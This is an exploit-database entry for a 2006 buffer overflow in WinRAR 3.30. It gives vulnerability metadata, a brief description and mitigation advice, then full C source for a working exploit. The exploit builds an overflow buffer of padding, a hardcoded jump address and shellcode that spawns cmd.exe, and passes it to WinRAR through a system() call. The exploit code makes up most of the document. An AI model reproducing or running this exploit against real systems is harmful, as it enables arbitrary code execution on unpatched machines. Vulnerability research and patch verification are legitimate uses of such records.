WinRAR Buffer Overflow 3.30 Exploit

vendor:

WinRAR

by:

Vredited By Alpha Programmer & Trap-Set U.H Team & K4P0

8.8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: WinRAR

Affected Version From: 3.3

Affected Version To: 3.3

Patch Exists: YES

Related CWE: N/A

CPE: a:winrar:winrar

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

WinRAR Buffer Overflow 3.30 Exploit

WinRAR is prone to a buffer overflow vulnerability when handling specially crafted files. This vulnerability is due to a boundary error when handling long file names. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability affects WinRAR versions 3.30 and prior.

Mitigation:

Upgrade to the latest version of WinRAR.

Source

Exploit-DB raw data:

/* WinRAR Buffer Overflow 3.30 Exploit
*
* Bug founded by: Vredited By Alpha Programmer & Trap-Set U.H Team
* Exploit made by: K4P0
* Contact: k4p0k4p0@hotmail.com
*/

#include <stdio.h>
#include <windows.h>

int main(void)
{
   char EvilBuff[1024];

   // Normal cmd.exe shellcode.
   char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
   		      "\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6"
		      "\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
                      "\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";

   char jmpesp_offset[] = "\x0F\x98\xF8\x77";
   char Prog[1024] = "WinRAR ";

   printf("WinRAR Buffer Overflow 3.30 Exploit\n\n");
   printf("Bug discovered by: Vredited By Alpha Programmer & Trap-Set U.H Team\n");
   printf("Exploit made by: K4P0\n");
   memset(EvilBuff, 0x00, 1024);
   memset(EvilBuff, 0x41, 510);
   strncat(EvilBuff, jmpesp_offset, 1024);
   strncat(EvilBuff, shellcode, 1024);
   strncat(Prog, EvilBuff, 1024);
   printf("\nExploiting...\n");
   system(Prog);
   return 0;
}

// milw0rm.com [2006-01-04]